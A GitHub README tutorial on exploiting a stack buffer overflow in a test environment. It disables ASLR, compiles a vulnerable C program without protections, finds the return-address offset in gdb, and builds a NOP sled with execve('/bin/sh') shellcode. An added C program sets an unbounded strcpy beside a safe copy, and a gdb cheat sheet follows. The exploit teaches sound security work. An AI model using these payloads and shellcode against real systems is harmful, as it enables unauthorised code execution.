https://github.com/syedsaadahmed/buffer-overflow-vulnerability

Testing the buffer overflow vulnerability in a test environment
bash buffer-overflow buffer-overflow-attack linux-shell ubuntu

# Buffer-Overflow-Vulnerability
Testing the buffer overflow vulnerability in a test environment

# A Brief Introduction

This is a tutorial built around a small C program, just to trigger and exploit a stack buffer overflow on an Ubuntu 18.04 server.

# Pre-requisites
```
ubuntu 18.04 server
gcc (C compiler)
gdb (debugger, used to step through the compiled code and inspect the memory layout; the pattern_create step below additionally assumes a gdb plugin such as gdb-peda is loaded, since plain gdb has no such command)
```
## Disable ASLR (memory randomization), enable core dumps
```
cat /proc/sys/kernel/randomize_va_space
# appending to /etc/sysctl.conf makes the setting persist across reboots; revert it when done
sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
sudo sysctl -p
cat /proc/sys/kernel/randomize_va_space
# verify "0"
# ulimit applies only to the current shell, so run it in the shell you start gdb from
ulimit -c unlimited
ulimit -c
# verify "unlimited"
```
# Steps to Execute

First of all, clone this git repository on the Ubuntu server you are using:
```
git clone https://github.com/syedsaadahmed/Buffer-Overflow-Vulnerability.git
```
Secondly, compile the C code with the usual protections switched off: `-fno-stack-protector` removes the stack canary, `-z execstack` makes the stack executable so shellcode placed there can run, and `-no-pie` gives the binary a fixed load address.
```
gcc -fno-stack-protector -z execstack -no-pie vuln.c -o vuln
```
Load the binary in gdb (`gdb ./vuln`) and crash it by passing 550 characters as the argument; the segmentation fault shows the input runs past the end of the buffer. The one-liners use Python 2 syntax (`print` as a statement); under Python 3 the `\x90` bytes used later would be written out as two-byte UTF-8 sequences rather than single bytes.
```
run $(python -c 'print "a" * 550')
```
Next, run it again with a cyclic pattern instead of plain `a`s (`pattern_create` is a gdb-peda command). Because every short window of the pattern is unique, the pattern bytes found at `$rsp` and in the registers after the crash (gdb-peda's `pattern_search` locates them for you) give the exact distance from the start of the buffer to the saved return address. That distance is what the sled, shellcode and filler in the next step have to add up to.
```
pattern_create 550 pat
run $(cat pat)
```
Now send the real payload layout: a 450-byte NOP sled, the 27-byte x86-64 `execve("/bin/sh")` shellcode, 43 bytes of `A` filler, and six placeholder `b` bytes where the saved return address sits. The first three parts total 520 bytes, which must equal the offset measured in the pattern step. Only six bytes are written because a canonical x86-64 user-space address fits in 48 bits: the input's terminating NUL supplies the seventh byte and the eighth byte of the saved address is already zero.
```
r $(python -c 'print "\x90"*450 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+ "\x41"*43 + "b"*6')
```
Check the memory around the stack pointer to verify the overwrite. The long run of `0x90909090` words is the sled; any address inside it is a usable return address.
```
x/200x $rsp
```
Finally, replace the placeholder with a real address inside the sled, written little-endian. `\x80\xe6\xff\xff\xff\x7f` is `0x7fffffffe680` in the author's environment; with ASLR off the stack is stable from run to run, but the exact value depends on your environment (environment variables, program path, whether it runs under gdb), so take it from your own `x/200x $rsp` output. When the return lands in the sled, execution slides into the shellcode and spawns a shell.
```
r $(python -c 'print "\x90"*450+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x41"*43+"\x80\xe6\xff\xff\xff\x7f"')
```
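The program below is an added example, not the repository's `vuln.c` (which this page does not show). It puts the pieces of the procedure above into code: the kind of unchecked copy that makes the target exploitable next to a bounded replacement, a `pattern_create`/`pattern_offset` equivalent for measuring the distance from the buffer to the saved return address, and the sled + shellcode + filler + six-byte return-address layout used in the gdb commands, with a check that the payload contains no NUL byte (a NUL would truncate it before it reached the return address). The buffer size, the function names, the 520-byte offset and the "crash bytes" in `main` are assumptions for illustration; the shellcode and the `0x7fffffffe680` address are the ones on this page.

```c
/*
 * Added example (not the repository's vuln.c): vulnerable copy vs. bounded
 * copy, a cyclic pattern for finding the return-address offset, and the
 * payload layout used by the gdb commands on this page.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 500 /* assumed; the real vuln.c is not shown on this page */

/* Vulnerable pattern: strcpy() stops only at a NUL, so an argv[1] longer than
 * BUF_SIZE overwrites the saved rbp and the return address above buf. */
size_t vulnerable_copy(const char *input) {
    char buf[BUF_SIZE];
    strcpy(buf, input);              /* no bound: the overflow happens here */
    return strlen(buf);
}

/* Hardened form: truncate to the buffer and always NUL-terminate. */
size_t safe_copy(const char *input) {
    char buf[BUF_SIZE];
    size_t n = strlen(input);
    if (n > sizeof buf - 1)
        n = sizeof buf - 1;          /* leave room for the terminator */
    memcpy(buf, input, n);
    buf[n] = '\0';
    return strlen(buf);
}

/* Metasploit-style cyclic pattern ("Aa0Aa1Aa2..."): every 4-byte window is
 * unique, so the bytes seen at $rsp after the crash identify their offset. */
size_t pattern_create(char *out, size_t n) {
    size_t k = 0;
    for (char a = 'A'; a <= 'Z' && k < n; a++)
        for (char b = 'a'; b <= 'z' && k < n; b++)
            for (char c = '0'; c <= '9' && k < n; c++) {
                char chunk[3] = { a, b, c };
                for (int i = 0; i < 3 && k < n; i++)
                    out[k++] = chunk[i];
            }
    return k;
}

/* Offset of the crash bytes inside the pattern, or -1 if they are not in it. */
long pattern_offset(const char *pat, size_t patlen, const void *seen, size_t seenlen) {
    for (size_t i = 0; i + seenlen <= patlen; i++)
        if (memcmp(pat + i, seen, seenlen) == 0)
            return (long)i;
    return -1;
}

/* The 27-byte x86-64 execve("/bin/sh") shellcode from this page (NUL-free). */
static const unsigned char SHELLCODE[] =
    "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb"
    "\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";
#define SHELLCODE_LEN (sizeof SHELLCODE - 1)

/* Lay out sled + shellcode + filler so that the saved return address, at
 * `offset` bytes from the start of the buffer, is replaced by the low six
 * bytes of ret_addr in little-endian order. Returns the payload length, or 0
 * if the pieces do not fit. */
size_t build_payload(unsigned char *out, size_t cap, size_t offset,
                     size_t sled_len, uint64_t ret_addr) {
    if (sled_len + SHELLCODE_LEN > offset || offset + 6 > cap)
        return 0;
    memset(out, 0x90, sled_len);                        /* NOP sled */
    memcpy(out + sled_len, SHELLCODE, SHELLCODE_LEN);    /* shellcode */
    memset(out + sled_len + SHELLCODE_LEN, 'A',
           offset - sled_len - SHELLCODE_LEN);          /* filler up to RIP */
    for (int i = 0; i < 6; i++)                         /* 48-bit address */
        out[offset + i] = (unsigned char)(ret_addr >> (8 * i));
    return offset + 6;
}

/* Index of the first NUL in the payload, or -1 if there is none. A NUL before
 * the end would stop strcpy()/argv from delivering the rest of the payload. */
long first_nul(const unsigned char *p, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0)
            return (long)i;
    return -1;
}

int main(void) {
    char pat[550];
    size_t plen = pattern_create(pat, sizeof pat);
    /* Constructed crash value: pretend gdb showed these 8 pattern bytes at $rsp. */
    long off = pattern_offset(pat, plen, pat + 520, 8);
    printf("pattern length %zu, return address at offset %ld\n", plen, off);

    unsigned char payload[600];
    size_t n = build_payload(payload, sizeof payload, (size_t)off, 450,
                             0x7fffffffe680ULL);       /* the page's sled address */
    printf("payload %zu bytes, first NUL at %ld (-1 means none)\n",
           n, first_nul(payload, n));
    return 0;
}
```

With the assumed offset of 520, `build_payload` produces exactly the 450 + 27 + 43 + 6 = 526 bytes of the page's final `r` command, and `first_nul` confirms that neither the shellcode nor the address `0x7fffffffe680` contains a zero byte; an address such as `0x7fffffff0080` would fail that check and the payload would be cut short.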
# GDB CheatSheet

This is just a set of commands to help us use gdb while debugging the program.
```
# quit the debugger
quit

# clear the screen
ctrl + l
shell clear

# show debugging symbols, ie. code
list
list main

# show the assembly code
disas main

# examine information
info os

info functions

info variables

# run the program, with input
run Hello

# examine memory below the stack pointer (on x86-64 use $rsp; $esp is the 32-bit name)
x/200x ($esp - 550)

# confirm overwrite of the saved base pointer (ebp/rbp) and the return address
info registers

# register reference (32-bit names; on x86-64 the same registers are rdi, rsi, rip, rbp, rsp, rdx)
EDI = destination index, string / array copying
ESI = source index, string / array copying

EIP = instruction pointer, next address to execute
EBP = stack base pointer
ESP = stack pointer, starting in high memory, going down
EDX = data register
```